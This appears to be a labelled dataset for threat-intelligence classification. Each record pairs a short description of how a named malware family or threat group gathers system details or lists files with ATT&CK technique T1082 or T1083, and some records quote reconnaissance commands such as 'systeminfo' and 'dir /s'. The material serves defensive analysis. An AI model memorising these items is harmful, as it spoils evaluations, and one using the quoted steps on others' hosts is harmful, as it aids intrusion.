{"text1":"HELLOKITTY can enumerate logical drives on a target system.","labels":"['T1082']"}
|
|
{"text1":"HEXANE has collected the hostname of a compromised machine.","labels":"['T1082']"}
|
|
{"text1":"HermeticWiper can determine the OS version, bitness, and enumerate physical drives on a targeted host.","labels":"['T1082']"}
|
|
{"text1":"Heyoka Backdoor can enumerate drives on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Higaisa collected the system volume serial number, GUID, and computer name.","labels":"['T1082']"}
|
|
{"text1":"Hildegard has collected the host's OS, CPU, and memory information.","labels":"['T1082']"}
|
|
{"text1":"HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.","labels":"['T1082']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.","labels":"['T1082']"}
|
|
{"text1":"IcedID has the ability to identify the computer name and OS version on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host.","labels":"['T1082']"}
|
|
{"text1":"Industroyer collects the victim machine\u2019s Windows GUID.","labels":"['T1082']"}
|
|
{"text1":"InnaputRAT gathers volume drive information and system information.","labels":"['T1082']"}
|
|
{"text1":"Ixeshe collects the computer name of the victim's system during the initial infection.","labels":"['T1082']"}
|
|
{"text1":"JPIN can obtain system information such as OS version and disk space.","labels":"['T1082']"}
|
|
{"text1":"KARAE can collect system information.","labels":"['T1082']"}
|
|
{"text1":"KGH_SPY can collect drive information from a compromised host.","labels":"['T1082']"}
|
|
{"text1":"KOMPROGO is capable of retrieving information about the infected system.","labels":"['T1082']"}
|
|
{"text1":"KONNI can gather the OS version, architecture information, connected drives, hostname, RAM size, and disk space information from the victim\u2019s machine and has used \"cmd \/c systeminfo\" command to get a snapshot of the current system state of the target machine.","labels":"['T1082']"}
|
|
{"text1":"Kasidet has the ability to obtain a victim's system name and operating system version.","labels":"['T1082']"}
|
|
{"text1":"Kazuar gathers information on the system and local drives.","labels":"['T1082']"}
|
|
{"text1":"Ke3chang performs operating system information discovery using \"systeminfo\" and has used implants to identify the system language and computer name.","labels":"['T1082']"}
|
|
{"text1":"Kessel has collected the system architecture, OS version, and MAC address information.","labels":"['T1082']"}
|
|
{"text1":"Kevin can enumerate the OS version and hostname of a targeted machine.","labels":"['T1082']"}
|
|
{"text1":"KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.","labels":"['T1082']"}
|
|
{"text1":"KillDisk retrieves the hard disk name by calling the \"CreateFileA to \\\\.\\PHYSICALDRIVE0\" API.","labels":"['T1082']"}
|
|
{"text1":"Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the \"systeminfo\" command.","labels":"['T1082']"}
|
|
{"text1":"Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Kobalos can record the hostname and kernel version of the target machine.","labels":"['T1082']"}
|
|
{"text1":"Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands \"systeminfo\", \"net config workstation\", \"hostname\", \"ver\", \"set\", and \"date \/t\".","labels":"['T1082']"}
|
|
{"text1":"Linfo creates a backdoor through which remote attackers can retrieve system information.","labels":"['T1082']"}
|
|
{"text1":"LitePower has the ability to list local drives and enumerate the OS architecture.","labels":"['T1082']"}
|
|
{"text1":"Lizar can collect the computer name from the machine.","labels":"['T1082']"}
|
|
{"text1":"Lokibot has the ability to discover the computer name and Windows product name\/version.","labels":"['T1082']"}
|
|
{"text1":"LoudMiner has monitored CPU usage.","labels":"['T1082']"}
|
|
{"text1":"MacMa can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes.","labels":"['T1082']"}
|
|
{"text1":"Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer\/host name to send to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"MarkiRAT can obtain the computer name from a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Metamorfo has collected the hostname and operating system version from the compromised host.","labels":"['T1082']"}
|
|
{"text1":"Meteor has the ability to discover the hostname of a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Milan can enumerate the targeted machine's name and GUID.","labels":"['T1082']"}
|
|
{"text1":"MiniDuke can gather the hostname on a compromised machine.","labels":"['T1082']"}
|
|
{"text1":"MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.","labels":"['T1082']"}
|
|
{"text1":"Mongall can identify drives on compromised hosts and retrieve the hostname via `gethostbyname`.","labels":"['T1082']"}
|
|
{"text1":"MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.","labels":"['T1082']"}
|
|
{"text1":"More_eggs has the capability to gather the OS version and computer name.","labels":"['T1082']"}
|
|
{"text1":"MuddyWater has used malware that can collect the victim\u2019s OS version and machine name.","labels":"['T1082']"}
|
|
{"text1":"Mustang Panda has gathered system information using \"systeminfo\".","labels":"['T1082']"}
|
|
{"text1":"NETWIRE can discover and collect victim system information.","labels":"['T1082']"}
|
|
{"text1":"Naid collects a unique identifier (UID) from a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Nebulae can discover logical drive information including the drive type, free space, and volume information.","labels":"['T1082']"}
|
|
{"text1":"Netwalker can determine the system architecture it is running on to choose which version of the DLL to use.","labels":"['T1082']"}
|
|
{"text1":"OSInfo discovers information about the infected machine.","labels":"['T1082']"}
|
|
{"text1":"OceanSalt can collect the computer name from the system.","labels":"['T1082']"}
|
|
{"text1":"OilRig has run \"hostname\" and \"systeminfo\" on a victim.","labels":"['T1082']"}
|
|
{"text1":"Okrum can collect computer name, locale information, and information about the OS and architecture.","labels":"['T1082']"}
|
|
{"text1":"Orz can gather the victim OS version and whether it is 64 or 32 bit.","labels":"['T1082']"}
|
|
{"text1":"POWERSTATS can retrieve OS name\/architecture and computer\/domain name information from compromised hosts.","labels":"['T1082']"}
|
|
{"text1":"PUNCHBUGGY can gather system information such as computer names.","labels":"['T1082']"}
|
|
{"text1":"Pasam creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.","labels":"['T1082']"}
|
|
{"text1":"Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. Patchwork also enumerated all available drives on the victim's machine.","labels":"['T1082']"}
|
|
{"text1":"Penquin can report the file system type and disk space of a compromised host to C2.","labels":"['T1082']"}
|
|
{"text1":"PipeMon can collect and send OS version and computer name as a part of its C2 beacon.","labels":"['T1082']"}
|
|
{"text1":"PoetRAT has the ability to gather information about the compromised host.","labels":"['T1082']"}
|
|
{"text1":"Pony has collected the Service Pack, language, and region information to send to the C2.","labels":"['T1082']"}
|
|
{"text1":"PoshC2 contains modules, such as \"Get-ComputerInfo\", for enumerating common system information.","labels":"['T1082']"}
|
|
{"text1":"PowerShower has collected system information on the infected host.","labels":"['T1082']"}
|
|
{"text1":"Proxysvc collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.","labels":"['T1082']"}
|
|
{"text1":"QakBot can collect system information including the OS version and domain on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"QuasarRAT can gather system information from the victim\u2019s machine including the OS type.","labels":"['T1082']"}
|
|
{"text1":"RATANKBA gathers information about the OS architecture, OS name, and OS version\/Service pack.","labels":"['T1082']"}
|
|
{"text1":"REvil can identify the username, machine name, system language, keyboard layout, OS version, and system drive information on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"ROKRAT can gather the hostname and the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.","labels":"['T1082']"}
|
|
{"text1":"RTM can obtain the computer name, OS version, and default language identifier.","labels":"['T1082']"}
|
|
{"text1":"Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.","labels":"['T1082']"}
|
|
{"text1":"Reaver collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.","labels":"['T1082']"}
|
|
{"text1":"RedLeaves can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.","labels":"['T1082']"}
|
|
{"text1":"Remsec can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.","labels":"['T1082']"}
|
|
{"text1":"Revenge RAT collects the CPU information, OS information, and system language.","labels":"['T1082']"}
|
|
{"text1":"Rifdoor has the ability to identify the Windows version on the compromised host.","labels":"['T1082']"}
|
|
{"text1":"Rising Sun can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume.","labels":"['T1082']"}
|
|
{"text1":"Rocke has used uname -m to collect the name and information about the infected system's kernel.","labels":"['T1082']"}
|
|
{"text1":"RogueRobin gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.","labels":"['T1082']"}
|
|
{"text1":"RunningRAT gathers the OS version, logical drives information, processor information, and volume information.","labels":"['T1082']"}
|
|
{"text1":"Ryuk has called \"GetLogicalDrives\" to enumerate all mounted drives, and \"GetDriveTypeW\" to determine the drive type.","labels":"['T1082']"}
|
|
{"text1":"SDBbot has the ability to identify the OS version, OS bit information and computer name.","labels":"['T1082']"}
|
|
{"text1":"SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host.","labels":"['T1082']"}
|
|
{"text1":"SILENTTRINITY can collect information related to a compromised host, including OS version and a list of drives.","labels":"['T1082']"}
|
|
{"text1":"SLOWDRIFT collects and sends system information to its C2.","labels":"['T1082']"}
|
|
{"text1":"SMOKEDHAM has used the \"systeminfo\" command on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"SOUNDBITE is capable of gathering system information.","labels":"['T1082']"}
|
|
{"text1":"STARWHALE can gather the computer name of an infected host.","labels":"['T1082']"}
|
|
{"text1":"SUNBURST collected hostname, OS version, and device uptime.","labels":"['T1082']"}
|
|
{"text1":"SYSCON has the ability to use Systeminfo to identify system information.","labels":"['T1082']"}
|
|
{"text1":"Saint Bot can identify the OS version, CPU, and other details from a victim's machine.","labels":"['T1082']"}
|
|
{"text1":"Sandworm Team used a backdoor to enumerate information about the infected system's operating system.","labels":"['T1082']"}
|
|
{"text1":"ServHelper will attempt to enumerate Windows version and system architecture.","labels":"['T1082']"}
|
|
{"text1":"Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.","labels":"['T1082']"}
|
|
{"text1":"ShadowPad has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers.","labels":"['T1082']"}
|
|
{"text1":"SideTwist can collect the computer name of a targeted system.","labels":"['T1082']"}
|
|
{"text1":"Skidmap has the ability to check whether the infected system\u2019s OS is Debian or RHEL\/CentOS to determine which cryptocurrency miner it should use.","labels":"['T1082']"}
|
|
{"text1":"SodaMaster can enumerate the host name and OS version on a target system.","labels":"['T1082']"}
|
|
{"text1":"SombRAT can execute \"getinfo\" to enumerate the computer name and OS version of a compromised system.","labels":"['T1082']"}
|
|
{"text1":"SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo.","labels":"['T1082']"}
|
|
{"text1":"Sowbug obtained OS version and hardware configuration from a victim.","labels":"['T1082']"}
|
|
{"text1":"Spark can collect the hostname, keyboard layout, and language from the system.","labels":"['T1082']"}
|
|
{"text1":"Squirrelwaffle has gathered victim computer information and configurations.","labels":"['T1082']"}
|
|
{"text1":"Stealth Falcon malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.","labels":"['T1082']"}
|
|
{"text1":"StoneDrill has the capability to discover the system OS, Windows version, architecture and environment.","labels":"['T1082']"}
|
|
{"text1":"StreamEx has the ability to enumerate system information.","labels":"['T1082']"}
|
|
{"text1":"StrifeWater can collect the OS version, architecture, and machine name to create a unique token for the infected host.","labels":"['T1082']"}
|
|
{"text1":"StrongPity can identify the hard disk volume serial number on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"SysUpdate can determine whether a system has a 32 bit or 64 bit architecture.","labels":"['T1082']"}
|
|
{"text1":"Systeminfo can be used to gather information about the operating system.","labels":"['T1082']"}
|
|
{"text1":"TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information.","labels":"['T1082']"}
|
|
{"text1":"The IceApple Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary.","labels":"['T1082']"}
|
|
{"text1":"The initial beacon packet for Mis-Type contains the operating system version and file system of the victim.","labels":"['T1082']"}
|
|
{"text1":"The initial beacon packet for Misdat contains the operating system version of the victim.","labels":"['T1082']"}
|
|
{"text1":"The initial beacon packet for S-Type contains the operating system version and file system of the victim.","labels":"['T1082']"}
|
|
{"text1":"ThreatNeedle can collect system profile information from a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration.","labels":"['T1082']"}
|
|
{"text1":"Tropic Trooper has detected a target system\u2019s OS version and system volume information.","labels":"['T1082']"}
|
|
{"text1":"Tropic Trooper has detected a target system\u2019s OS version.","labels":"['T1082']"}
|
|
{"text1":"Turla surveys a system upon check-in to discover operating system configuration details using the \"systeminfo\" and \"set\" commands.","labels":"['T1082']"}
|
|
{"text1":"UPPERCUT has the capability to gather the system\u2019s hostname and OS version.","labels":"['T1082']"}
|
|
{"text1":"Ursnif has used Systeminfo to gather system information.","labels":"['T1082']"}
|
|
{"text1":"VERMIN collects the OS name, machine name, and architecture information.","labels":"['T1082']"}
|
|
{"text1":"Valak can determine the Windows version and computer name on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine.","labels":"['T1082']"}
|
|
{"text1":"WINDSHIELD can gather the victim computer name.","labels":"['T1082']"}
|
|
{"text1":"WINERACK can gather information about the host.","labels":"['T1082']"}
|
|
{"text1":"WellMess can identify the computer name of a compromised host.","labels":"['T1082']"}
|
|
{"text1":"WhisperGate has the ability to enumerate fixed logical drives on a targeted system.","labels":"['T1082']"}
|
|
{"text1":"WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"Windigo has used a script to detect which Linux distribution and version is currently installed on the system.","labels":"['T1082']"}
|
|
{"text1":"Windshift has used malware to identify the computer name of a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.","labels":"['T1082']"}
|
|
{"text1":"Winnti for Windows can determine if the OS on a compromised host is newer than Windows XP.","labels":"['T1082']"}
|
|
{"text1":"XAgentOSX contains the getInstalledAPP function to run \"ls -la \/Applications\" to gather what applications are installed.","labels":"['T1082']"}
|
|
{"text1":"XCSSET identifies the macOS version and uses \"ioreg\" to determine serial number.","labels":"['T1082']"}
|
|
{"text1":"YAHOYAH checks for the system\u2019s Windows OS version and hostname.","labels":"['T1082']"}
|
|
{"text1":"ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.","labels":"['T1082']"}
|
|
{"text1":"ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.","labels":"['T1082']"}
|
|
{"text1":"Zeus Panda collects the OS version, system architecture, computer name, product ID, install date, and information on the keyboard mapping to determine the language used on the system.","labels":"['T1082']"}
|
|
{"text1":"Zox can enumerate attached drives.","labels":"['T1082']"}
|
|
{"text1":"ZxShell can collect the local hostname, operating system details, CPU speed, and total physical memory.","labels":"['T1082']"}
|
|
{"text1":"ZxxZ has collected the host name and operating system product name from a compromised machine.","labels":"['T1082']"}
|
|
{"text1":"admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about the OS: \"ver >> %temp%\\download\" \"systeminfo >> %temp%\\download\"","labels":"['T1082']"}
|
|
{"text1":"build_downer has the ability to send system volume information to C2.","labels":"['T1082']"}
|
|
{"text1":"cmd can be used to find information about the operating system.","labels":"['T1082']"}
|
|
{"text1":"down_new has the ability to identify the system volume information of a compromised host.","labels":"['T1082']"}
|
|
{"text1":"gh0st RAT has gathered system architecture, processor, OS configuration, and installed hardware information.","labels":"['T1082']"}
|
|
{"text1":"jRAT collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.","labels":"['T1082']"}
|
|
{"text1":"njRAT enumerates the victim operating system and computer name during the initial infection.","labels":"['T1082']"}
|
|
{"text1":"3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory.","labels":"['T1083']"}
|
|
{"text1":"4H RAT has the capability to obtain file and directory listings.","labels":"['T1083']"}
|
|
{"text1":"A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions.","labels":"['T1083']"}
|
|
{"text1":"A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.","labels":"['T1083']"}
|
|
{"text1":"A variant of Elise executes \"dir C:\\progra~1\" when initially run.","labels":"['T1083']"}
|
|
{"text1":"A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.","labels":"['T1083']"}
|
|
{"text1":"ADVSTORESHELL can list files and directories.","labels":"['T1083']"}
|
|
{"text1":"APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms.","labels":"['T1083']"}
|
|
{"text1":"APT29 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\".","labels":"['T1083']"}
|
|
{"text1":"APT3 has a tool that looks for files and directories on the local file system.","labels":"['T1083']"}
|
|
{"text1":"APT32's backdoor possesses the capability to list files and directories on a machine.","labels":"['T1083']"}
|
|
{"text1":"APT38 has enumerated files and directories, or searched in specific locations within a compromised host.","labels":"['T1083']"}
|
|
{"text1":"Action RAT has the ability to collect drive and file information on an infected machine.","labels":"['T1083']"}
|
|
{"text1":"Amadey has searched for folders associated with antivirus software.","labels":"['T1083']"}
|
|
{"text1":"Aoqin Dragon has run scripts to identify file formats including Microsoft Word.","labels":"['T1083']"}
|
|
{"text1":"AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.","labels":"['T1083']"}
|
|
{"text1":"Aria-body has the ability to gather metadata from a file and to search for file and directory names.","labels":"['T1083']"}
|
|
{"text1":"Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.","labels":"['T1083']"}
|
|
{"text1":"AuditCred can search through folders and files on the system.","labels":"['T1083']"}
|
|
{"text1":"AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc, .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.","labels":"['T1083']"}
|
|
{"text1":"Avaddon has searched for specific files prior to encryption.","labels":"['T1083']"}
|
|
{"text1":"Avenger has the ability to browse files in directories such as Program Files and the Desktop.","labels":"['T1083']"}
|
|
{"text1":"Azorult can recursively search for files in folders and collect files from the desktop with certain extensions.","labels":"['T1083']"}
|
|
{"text1":"BACKSPACE allows adversaries to search for files.","labels":"['T1083']"}
|
|
{"text1":"BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory.","labels":"['T1083']"}
|
|
{"text1":"BBSRAT can list file and directory information.","labels":"['T1083']"}
|
|
{"text1":"BLACKCOFFEE has the capability to enumerate files.","labels":"['T1083']"}
|
|
{"text1":"BLINDINGCAN can search, read, write, move, and execute files.","labels":"['T1083']"}
|
|
{"text1":"BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.","labels":"['T1083']"}
|
|
{"text1":"Babuk has the ability to enumerate files on a targeted system.","labels":"['T1083']"}
|
|
{"text1":"BabyShark has used \"dir\" to search for \"programfiles\" and \"appdata\".","labels":"['T1083']"}
|
|
{"text1":"BackConfig has the ability to identify folders and files related to previous infections.","labels":"['T1083']"}
|
|
{"text1":"Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.","labels":"['T1083']"}
|
|
{"text1":"BadPatch searches for files with specific file extensions.","labels":"['T1083']"}
|
|
{"text1":"Bandook has a command to list files on a system.","labels":"['T1083']"}
|
|
{"text1":"Bazar can enumerate the victim's desktop.","labels":"['T1083']"}
|
|
{"text1":"BlackMould has the ability to find files on the targeted system.","labels":"['T1083']"}
|
|
{"text1":"BoomBox can search for specific files and directories on a machine.","labels":"['T1083']"}
|
|
{"text1":"BoxCaon has searched for files on the system, such as documents located in the desktop folder.","labels":"['T1083']"}
|
|
{"text1":"Brave Prince gathers file and directory information from the victim\u2019s machine.","labels":"['T1083']"}
|
|
{"text1":"CaddyWiper can enumerate all files and directories on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"Cardinal RAT checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload).","labels":"['T1083']"}
|
|
{"text1":"Caterpillar WebShell can search for files in directories.","labels":"['T1083']"}
|
|
{"text1":"ChChes collects the victim's %TEMP% directory path and version of Internet Explorer.","labels":"['T1083']"}
|
|
{"text1":"CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer.","labels":"['T1083']"}
|
|
{"text1":"Chimera has utilized multiple commands to identify data of interest in file and directory listings.","labels":"['T1083']"}
|
|
{"text1":"China Chopper's server component can list directory contents.","labels":"['T1083']"}
|
|
{"text1":"Clambling can browse directories on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"Clop has searched folders and subfolders for files to encrypt.","labels":"['T1083']"}
|
|
{"text1":"Cobalt Strike can explore files on a compromised system.","labels":"['T1083']"}
|
|
{"text1":"Confucius has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions.","labels":"['T1083']"}
|
|
{"text1":"Conti can discover files on a local system.","labels":"['T1083']"}
|
|
{"text1":"CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list.","labels":"['T1083']"}
|
|
{"text1":"CrackMapExec can discover specified filetypes and log files on a targeted system.","labels":"['T1083']"}
|
|
{"text1":"Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.","labels":"['T1083']"}
|
|
{"text1":"Cryptoistic can scan a directory to identify files for deletion.","labels":"['T1083']"}
|
|
{"text1":"Cuba can enumerate files by using a variety of functions.","labels":"['T1083']"}
|
|
{"text1":"Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory.","labels":"['T1083']"}
|
|
{"text1":"DDKONG lists files on the victim\u2019s machine.","labels":"['T1083']"}
|
|
{"text1":"DEATHRANSOM can use loop operations to enumerate directories on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"Dacls can scan directories on a compromised host.","labels":"['T1083']"}
|
|
{"text1":"Dark Caracal collected file listings of all default Windows directories.","labels":"['T1083']"}
|
|
{"text1":"DarkWatchman has the ability to enumerate file and folder names.","labels":"['T1083']"}
|
|
{"text1":"Darkhotel has used malware that searched for files with specific patterns.","labels":"['T1083']"}
|
|
{"text1":"Denis has several commands to search directories for files.","labels":"['T1083']"}
|
|
{"text1":"Derusbi is capable of obtaining directory, file, and drive listings.","labels":"['T1083']"}
|
|
{"text1":"Diavol has a command to traverse the files and directories in a given path.","labels":"['T1083']"}
|
|
{"text1":"Dragonfly 2.0 used a batch script to gather folder and file names from victim hosts.","labels":"['T1083']"}
|
|
{"text1":"Dragonfly has used a batch script to gather folder and file names from victim hosts.","labels":"['T1083']"}
|
|
{"text1":"DropBook can collect the names of all files and folders in the Program Files directories.","labels":"['T1083']"}
|
|
{"text1":"Dtrack can list files on available disk volumes.","labels":"['T1083']"}
|
|
{"text1":"During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.","labels":"['T1083']"}
|
|
{"text1":"Dust Storm has used Android backdoors capable of enumerating specific files on the infected devices.","labels":"['T1083']"}
|
|
{"text1":"DustySky scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.","labels":"['T1083']"}
|
|
{"text1":"Ebury can list directory entries.","labels":"['T1083']"}
|
|
{"text1":"Empire includes various modules for finding files of interest on hosts and network shares.","labels":"['T1083']"}
|
|
{"text1":"Epic recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\\Temp directories.","labels":"['T1083']"}
|
|
{"text1":"FALLCHILL can search files on a victim.","labels":"['T1083']"}
|
|
{"text1":"FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions.","labels":"['T1083']"}
|
|
{"text1":"FYAnti can search the \"C:\\Windows\\Microsoft.NET\\\" directory for files of a specified size.","labels":"['T1083']"}
|
|
{"text1":"FatDuke can enumerate directories on target machines.","labels":"['T1083']"}
|
|
{"text1":"FinFisher enumerates directories and scans for certain files.","labels":"['T1083']"}
|
|
{"text1":"FoggyWeb's loader can check for the FoggyWeb backdoor .pri file on a compromised AD FS server.","labels":"['T1083']"}
|
|
{"text1":"Forfiles can be used to locate certain types of files\/directories in a system (e.g., all files with a specific extension, name, and\/or age).","labels":"['T1083']"}
|
|
{"text1":"FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.","labels":"['T1083']"}
|
|
{"text1":"Fysbis has the ability to search for files.","labels":"['T1083']"}
|
|
{"text1":"Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. Gamaredon Group has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.","labels":"['T1083']"}
|
|
{"text1":"Gelsemium can retrieve data from specific Windows directories, as well as open random files as part of Virtualization\/Sandbox Evasion.","labels":"['T1083']"}
|
|
{"text1":"GeminiDuke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.","labels":"['T1083']"}
|
|
{"text1":"Gold Dragon lists the directories for Desktop, program files, and the user\u2019s recently accessed files.","labels":"['T1083']"}
|
|
{"text1":"GoldenSpy has included a program \"ExeProtector\", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary.","labels":"['T1083']"}
|
|
{"text1":"GravityRAT collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1083']"}
|
|
{"text1":"HOPLIGHT has been observed enumerating system drives and partitions.","labels":"['T1083']"}
|
|
{"text1":"HTTPBrowser is capable of listing files, folders, and drives on a victim.","labels":"['T1083']"}
|
|
{"text1":"Heyoka Backdoor has the ability to search the compromised host for files.","labels":"['T1083']"}
|
|
{"text1":"Honeybee's service-based DLL implant traverses the FTP server\u2019s directories looking for files with keyword matches for computer names or certain keywords.","labels":"['T1083']"}
|
|
{"text1":"HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types.","labels":"['T1083']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.","labels":"['T1083']"}
|
|
{"text1":"Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory and, if not, copies itself there.","labels":"['T1083']"}
|
|
{"text1":"Inception used a file listing plugin to collect information about files and directories on both local and remote drives.","labels":"['T1083']"}
|
|
{"text1":"InnaputRAT enumerates directories and obtains file attributes on a system.","labels":"['T1083']"}
|
|
{"text1":"InvisiMole can list information about files in a directory and recently opened or used documents. InvisiMole can also search for specific files by supplied file mask.","labels":"['T1083']"}
|
|
{"text1":"Ixeshe can list file and directory information.","labels":"['T1083']"}
|
|
{"text1":"JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe.","labels":"['T1083']"}
|
|
{"text1":"KEYMARBLE has a command to search for files on the victim\u2019s machine.","labels":"['T1083']"}
|
|
{"text1":"Kasidet has the ability to search for a given filename on a victim.","labels":"['T1083']"}
|
|
{"text1":"Ke3chang uses command-line interaction to search files and directories.","labels":"['T1083']"}
|
|
{"text1":"KeyBoy has a command to launch a file browser or explorer on the system.","labels":"['T1083']"}
|
|
{"text1":"KillDisk has used the \"FindNextFile\" command as part of its file deletion process.","labels":"['T1083']"}
|
|
{"text1":"Koadic can obtain a list of directories.","labels":"['T1083']"}
|
|
{"text1":"Kwampirs collects a list of files and directories in C:\\ with the command \"dir \/s \/a c:\\ >> \"C:\\windows\\TEMP\\[RANDOM].tmp\"\".","labels":"['T1083']"}
|
|
{"text1":"Leafminer used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.","labels":"['T1083']"}
|
|
{"text1":"Linfo creates a backdoor through which remote attackers can list contents of drives and search for files.","labels":"['T1083']"}
|
|
{"text1":"MESSAGETAP checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds.","labels":"['T1083']"}
|
|
{"text1":"MacMa can search for a specific file on the compromised computer and can enumerate files in Desktop, Downloads, and Documents folders.","labels":"['T1083']"}
|
|
{"text1":"Machete produces file listings in order to search for files to be exfiltrated.","labels":"['T1083']"}
|
|
{"text1":"Magic Hound malware can list a victim's logical drives and their type, as well as the total\/free space of the fixed devices. Other malware can list a directory's contents.","labels":"['T1083']"}
|
|
{"text1":"MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.","labels":"['T1083']"}
|
|
{"text1":"MegaCortex can parse the available drives and directories to determine which files to encrypt.","labels":"['T1083']"}
|
|
{"text1":"Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.","labels":"['T1083']"}
|
|
{"text1":"MiniDuke can enumerate local drives.","labels":"['T1083']"}
|
|
